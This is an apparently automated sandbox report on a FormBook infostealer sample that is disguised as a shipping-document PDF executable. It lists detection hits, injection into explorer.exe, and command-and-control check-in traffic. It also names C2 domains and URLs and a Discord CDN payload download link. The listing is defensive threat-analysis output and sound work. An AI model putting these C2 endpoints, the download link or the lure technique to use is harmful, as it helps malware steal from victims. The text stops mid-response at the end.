Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
37.123.118.150	www.blttsperma.quest	United Kingdom	13213	UK2NET-ASGB	true
213.186.33.5	www.jkformationfrance.com	France	16276	OVHFR	false
162.159.129.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
34.102.136.180	alltart.com	United States	15169	GOOGLEUS	false
3.64.163.50	www.bombers.xyz	United States	16509	AMAZON-02US	false
35.209.104.90	www.thesidehustler.net	United States	19527	GOOGLE-2US	false
162.159.133.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false
3.223.115.185	HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false

Contacted Domains

Name	IP	Active
www.blttsperma.quest	37.123.118.150	true
www.thesidehustler.net	35.209.104.90	true
www.bombers.xyz	3.64.163.50	true
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com	3.223.115.185	true
pampelina.com	81.2.194.128	true
cdn.discordapp.com	162.159.129.233	true
www.jkformationfrance.com	213.186.33.5	true
alltart.com	34.102.136.180	true
eimzaizmir.com	34.102.136.180	true
www.goodtasteonline.com	unknown	unknown
www.mmfaccao.com	unknown	unknown
www.lnvietnam.online	unknown	unknown
www.eimzaizmir.com	unknown	unknown
www.pampelina.com	unknown	unknown
www.alltart.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.lnvietnam.online/epns/	true	Avira URL Cloud: safe	low
http://www.goodtasteonline.com/epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB	true	Avira URL Cloud: safe	unknown
http://www.alltart.com/epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6	false	Avira URL Cloud: safe	unknown
http://www.jkformationfrance.com/epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f	true	Avira URL Cloud: safe	unknown
http://www.eimzaizmir.com/epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6	false	Avira URL Cloud: safe	unknown
http://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk	true	Avira URL Cloud: safe	unknown
http://www.bombers.xyz/epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6	true	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq	false		high

AV Detection:

Found malware configuration

Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe

Avira: detection malicious, Label: HEUR/AGEN.1103161

Antivirus or Machine Learning detection for unpacked file

Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.1.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.Nyedvqj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49760 version: TLS 1.2

Source:	Binary string: cmmon32.pdb source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: netsh.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.376044686.0000000000B60000.00000040.00000001.sdmp, Nyedvqj.exe, 00000011.00000002.376043225.00000000009B0000.00000040.00000001.sdmp, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, Nyedvqj.exe, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop esi	11_2_0041582C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop edi	11_2_004162E7
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop ebx	11_2_00406ABF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 4x nop then pop edi	11_2_00415677
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop esi	17_2_0041582C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop edi	17_2_004162E7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop ebx	17_2_00406ABF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 4x nop then pop edi	17_2_00415677

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.goodtasteonline.com
Source: C:\Windows\explorer.exe	Domain query: www.thesidehustler.net
Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mmfaccao.com
Source: C:\Windows\explorer.exe	Domain query: www.lnvietnam.online
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.104.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.223.115.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe	Domain query: www.bombers.xyz
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.jkformationfrance.com
Source: C:\Windows\explorer.exe	Domain query: www.alltart.com

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.bombers.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.lnvietnam.online/epns/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Qaf9b58Tbh8Z520YhGjeYYsoKHR90rBEG3FUA1hNyjMgDr+YB08dwxAknUVnxeGDxphK&wVzHJ=BRWdQ6 HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f HTTP/1.1Host: www.jkformationfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6 HTTP/1.1Host: www.bombers.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB HTTP/1.1Host: www.goodtasteonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6 HTTP/1.1Host: www.alltart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk HTTP/1.1Host: www.thesidehustler.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6 HTTP/1.1Host: www.eimzaizmir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.10.3 (Ubuntu)Date: Wed, 13 Oct 2021 18:37:08 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:37:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:37:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> 